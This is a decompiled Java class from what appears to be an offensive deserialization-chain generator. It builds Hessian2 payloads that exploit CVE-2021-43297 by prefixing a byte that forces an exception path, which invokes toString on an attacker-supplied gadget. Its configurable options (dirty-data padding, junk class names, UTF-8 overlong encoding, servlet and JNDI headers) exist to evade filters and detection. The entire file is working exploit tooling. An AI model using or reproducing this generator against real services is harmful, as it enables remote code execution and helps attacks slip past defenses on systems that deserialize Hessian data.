/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.core.payload.AbstractHessianPayload;
import com.ar3h.chains.core.payload.enhance.DirtyDataWrapper;
import com.ar3h.chains.core.payload.enhance.Hessian2OutputEnhance;
import com.ar3h.chains.core.payload.impl.Hessian2Payload;
import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.SerializerFactory;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@PayloadAnnotation(name="Hessian2 \u5f3a\u5236\u62a5\u9519\u8c03\u7528 toString", description="CVE-2021-43297\nHessian2Input \u7684 com.caucho.hessian.io.Hessian2Input.expect \u51fd\u6570\u5185\u53ef\u4ee5\u901a\u8fc7\u9690\u5f0f\u5b57\u7b26\u4e32\u8f6c\u6362\u89e6\u53d1\u5bf9\u8c61\u7684toString\u65b9\u6cd5", gadgetTags={"ToString"}, excludes={"NotForHessian"}, mode={"Generate"}, authors={"Unam4"}, priority=10)
public class Hessian2ToStringPayload
extends AbstractHessianPayload {
    private static final Logger log = LoggerFactory.getLogger(Hessian2ToStringPayload.class);
    @Param(name="\u968f\u673a\u96c6\u5408\u810f\u6570\u636e\u5927\u5c0f", description="\u968f\u673a\u4f7f\u7528 ArrayList/LinkedList/HashMap/LinkedHashMap/TreeMap \u7b49\u96c6\u5408\u7c7b\u578b\u6765\u5c01\u88c5 object\uff0c\u5e76\u6307\u5b9a\u810f\u6570\u636e\u5927\u5c0f\n\u63a8\u8350\u4f7f\u7528\u8be5\u6df7\u6dc6\n\u53c2\u8003\u6570\u636e\uff1a1\u5343\u4e07\u810f\u6570\u636e\u9700\u89812\u79d2, \u53ef\u751f\u6210 43MB Payload")
    @Min(value=0L)
    @Max(value=30000000L)
    public @Min(value=0L) @Max(value=30000000L) int dirtyCollectionSize = 0;
    @Param(name="\u586b\u5145\u5783\u573e\u7c7b\u7684\u6570\u91cf", description="\u4f7f\u7528 LinkedList \u5305\u88c5\u968f\u673a\u5783\u573e\u7c7b\u540d\u6765\u5c01\u88c5 object\n\u751f\u6210\u901f\u5ea6\u6781\u6162\uff0c\u4e0d\u5efa\u8bae\u8bbe\u7f6e\u8d85\u8fc710w\n\u53c2\u8003\u6570\u636e\uff1a10w\u810f\u6570\u636e\u9700\u89818\u79d2, \u53ef\u751f\u6210 2.5MB Payload")
    @Min(value=0L)
    @Max(value=100000L)
    public @Min(value=0L) @Max(value=100000L) int dirtyClassSize = 0;
    @Param(name="Utf8OverlongEncoding", description="0: \u4e0d\u5f00\u542f utf8 overlong encoding\n1: \u968f\u673a\u5e73\u5747\u6df7\u54082\u30013 utf8 overlong encoding\n2: \u7eaf2\u5b57\u8282 utf8 overlong encoding\n3: \u7eaf3\u5b57\u8282 utf8 overlong encoding", type=ParamType.Choice, choices={@Choice(value="0", label="\u4e0d\u5f00\u542f utf8 overlong encoding"), @Choice(value="1", label="\u968f\u673a\u5e73\u5747\u6df7\u54082\u30013 utf8 overlong encoding"), @Choice(value="2", label="\u7eaf2\u5b57\u8282 utf8 overlong encoding"), @Choice(value="3", label="\u7eaf3\u5b57\u8282 utf8 overlong encoding")})
    public String overlongMode = "0";
    @Param(name="\u542f\u7528HessianServlet\u683c\u5f0f\u5e76\u8bbe\u7f6eheader\u957f\u5ea6", description="\u5728\u539f\u6765\u7684Hessian Payload\u57fa\u7840\u4e0a\u52a0\u7279\u6b8a\u7684header\u5934\uff0c\u4f7f\u5176\u7b26\u5408 HessianServlet \u6216 jndi2Hessian \u683c\u5f0f", type=ParamType.Choice, choices={@Choice(value="disable", label="disable"), @Choice(value="hessianServletFormat", label="hessianServlet header \u5934\u683c\u5f0f"), @Choice(value="jndi2hessianFormat", label="jndi2hessian header \u5934\u683c\u5f0f")})
    public String openservletHeader = "disable";

    @Override
    public byte[] marshal(Object obj) throws Exception {
        int overlongMode = Integer.parseInt(this.overlongMode);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        Hessian2Output out = new Hessian2Output((OutputStream)bos);
        Object objWraped = DirtyDataWrapper.builder(obj).withDirtyCollectionSize(this.dirtyCollectionSize).withDirtyClassSize(this.dirtyClassSize).build();
        if (overlongMode > 0) {
            log.info("Enable Hessian2 utf8overlong, overlongMode: {}", (Object)overlongMode);
            out = Hessian2OutputEnhance.getHessian2Output(bos, overlongMode);
        }
        AbstractHessianPayload.NoWriteReplaceSerializerFactory sf = new AbstractHessianPayload.NoWriteReplaceSerializerFactory();
        sf.setAllowNonSerializable(true);
        out.setSerializerFactory((SerializerFactory)sf);
        out.writeObject(objWraped);
        out.close();
        byte[] result = bos.toByteArray();
        byte[] exceptPayload = new byte[result.length + 1];
        System.arraycopy(new byte[]{67}, 0, exceptPayload, 0, 1);
        System.arraycopy(result, 0, exceptPayload, 1, result.length);
        if (this.openservletHeader.equals("hessianServletFormat")) {
            log.info("Enable HessianServlet Format");
            exceptPayload = this.appendHessianServletHeader(exceptPayload);
        } else if (this.openservletHeader.equals("jndi2hessianFormat")) {
            log.info("Enable jndi2hessian Format");
            exceptPayload = this.appendJndi2HessianHeader(exceptPayload);
        }
        return exceptPayload;
    }

    public byte[] appendHessianServletHeader(byte[] payload) throws IOException {
        ByteArrayOutputStream stream = new ByteArrayOutputStream();
        stream.write(72);
        stream.write(2);
        stream.write(0);
        stream.write(67);
        stream.flush();
        stream.write(payload);
        return stream.toByteArray();
    }

    public byte[] appendJndi2HessianHeader(byte[] payload) throws IOException {
        ByteArrayOutputStream stream = new ByteArrayOutputStream();
        stream.write(72);
        stream.write(2);
        stream.write(0);
        stream.write(70);
        stream.flush();
        stream.write(payload);
        return stream.toByteArray();
    }

    @Override
    public Object unmarshal(byte[] data) throws Exception {
        return Hessian2Payload.deserialize(data);
    }
}

